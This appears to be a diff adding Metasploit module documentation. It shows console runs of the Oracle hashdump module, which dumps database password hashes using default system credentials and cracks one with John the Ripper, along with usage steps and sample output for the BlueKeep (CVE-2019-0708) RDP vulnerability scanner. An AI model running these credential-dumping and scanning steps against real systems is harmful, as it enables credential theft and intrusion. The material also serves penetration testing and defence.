+127.0.0.1  127.0.0.1  1522/tcp (oracle)  SCOTT   S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699         Nonreplayable hash  oracle12c
+```
+
+These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using [John The Ripper "bleeding_jumbo"](https://github.com/magnumripper/JohnTheRipper)).
+
+```
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast
+msf5 auxiliary(analyze/jtr_oracle_fast) > run
+...
+[*] Cracking oracle12c hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] SCOTT:hunter2
+...
+```
+### Oracle 18c (18.4 XE) on Windows 2012
+
+```
+resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
+resource (oracle.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (oracle.rb)> set dbuser system
+dbuser => system
+resource (oracle.rb)> set dbpass oracle
+dbpass => oracle
+resource (oracle.rb)> set sid XE
+sid => XE
+resource (oracle.rb)> run
+[-] Version 18c is not currently supported
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Oracle 11g (11.2 XE) on Windows 2012
+
+```
+resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
+resource (oracle.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (oracle.rb)> set dbuser system
+dbuser => system
+resource (oracle.rb)> set dbpass oracle
+dbpass => oracle
+resource (oracle.rb)> set sid XE
+sid => XE
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true
+verbose => true
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+
+[*] Server is running version 11g
+[*] Hash table :
+ Oracle Server Hashes
+====================
+
+ Username          Hash
+ --------          ----
+ APEX_040000       S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
+ APEX_PUBLIC_USER  S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
+ APPQOSSYS         S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
+ CTXSYS            S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
+ DBSNMP            S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
+ DIP               S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
+ FLOWS_FILES       S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
+ HR                S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
+ MDSYS             S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
+ ORACLE_OCM        S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
+ OUTLN             S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
+ SYS               S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
+ SYSTEM            S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
+ XDB               S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
+ XS$NULL           S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
+
+[+] Hash Table has been saved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,79 @@
+[CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708) ("BlueKeep")  may allow an unauthenticated attacker to gain remote code execution on an unpatched Microsoft Windows workstation or server exposing the [Remote Desktop Protocol (RDP)](https://docs.microsoft.com/en-us/windows/desktop/termserv/remote-desktop-protocol).  As a result, the vulnerability has the maximum CVSS score of 10.0.
+
+The vulnerability exists and been patched in workstation editions of Windows XP, Windows Vista, and Windows 7.  Server releases of Windows are also affected and have been patched: Windows 2003, Windows 2008 and Windows 2008 R2.
+
+This module, `auxiliary/scanner/rdp/cve_2019_0708_bluekeep`, scans all versions of Windows, reporting back the vulnerable state of one or more targets.  The vulnerability is not known to exist in versions of Windows 8 (or above) or Windows 2012 (or above).  However, the scanner can safely be used against all Windows versions without effect on the RDP service or clients.
+
+## Vulnerable Application
+
+Remote Desktop Protocol (RDP), also known as Terminal Services, allows authenticated users to remotely administer Windows workstations and servers.  RDP is common in enterprise networks, as it allows IT administrators and users alike to conveniently work remotely.  Additionally, RDP is not uncommon to see exposed to the Internet, sometimes on its default port of TCP/3389.
+
+RDP is supported on Windows platforms from Windows XP through all modern versions of Windows.  Newer versions of Windows (XP SP3+, Vista, and up) support Network Level Authentication (NLA), which provides enhanced authentication and mitigates some RDP-based attacks.
+
+## Verification Steps
+
+  1. Set up a Windows target (XP, Vista, 7, 2003, 2008, 2008 R2).
+  2. Start msfconsole.
+  3. Load the module: `use auxiliary/scanner/rdp/cve_2019_0708_bluekeep`
+  4. Specify the IP address of one or more targets: `set RHOSTS 192.168.1.1-5`
+  5. Optionally, change the target port from the default of `3389`: `set RPORT 31337`
+  6. Launch the scanner: `run`
+
+## Scenarios
+
+#### A vulnerable version and configuration of Microsoft Windows
+If the target has RDP accessible with NLP disabled, and is running a vulnerable version of Windows (XP, 7, 2003, 2008, 2008 R2) without a [patch](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708), it will return a Vulnerable status:
+
+```
+[+] 192.168.1.2:3389  - The target is vulnerable.
+[*] 192.168.1.2:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A patched or NLP-enabled configuration of Microsoft Windows
+If the target has RDP accessible, but is not vulnerable for one or more reasons, it may have NLP enabled or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708).  In these cases, a patched or NLP-enabled target will return:
+
+```
+[*] 192.168.1.3:3389  - The target is not exploitable.
+[*] 192.168.1.3:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A non-vulnerable version of Microsoft Windows
+If the target has RDP accessible, but is a newer, non-vulnerable version of Windows (8, 10, 2012, 2016), or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708).  In these cases, a non-vulnerable target will return:
+
+```
+[*] 192.168.1.4:3389  - The target is not exploitable.
+[*] 192.168.1.4:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A host without RDP enabled
+A non-Windows target, or a Windows target with RDP disabled or firewalled, will report failure to connect:
+
+```
+[*] 192.168.220.1:3389    - The target service is not running, or refused our connection.
+[*] 192.168.220.1:3389    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Testing
+
+This scanner module has been tested against a variety of Windows hosts, ranging from Windows XP through Windows 2016.  During testing, no adverse effects or logging was identified on release builds.  (Note: Debug/checked builds exhibited crashes, but these should not be found in production environments.)
+
+Workstation versions:
+ - Windows XP SP2 (x86), SP3 (x86), Version 2003 (x64)
+ - Windows Vista SP0 (x86), SP0 (x64), SP2 (x64)
+ - Windows 7 SP1 (x86), SP1 (x64)
+ - Windows 10 1709, 1809 (x64)
+
+Server versions:
+ - Windows 2000 SP4 (x86)
+ - Windows 2003 SP0 (x86), SP1 (x86), SP1 (x64), SP2 (x86), R2 SP1 (x86), R2 SP2 (x86)
+ - Windows 2008 SP0 (x64), SP1 (x86), R2 SP1 (x64)
+ - Windows 2012 R2 (x64)
+ - Windows 2016 Build 1607 (x64)
+
+### Questions?  Issues?
+
+If you encounter issues with the module, consider reaching out to the developers and user community [using Slack](https://www.metasploit.com/slack).  If you encounter crashing on any targets, please consider [opening a issue](https://github.com/rapid7/metasploit-framework/issues/new).
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.3
 .6.2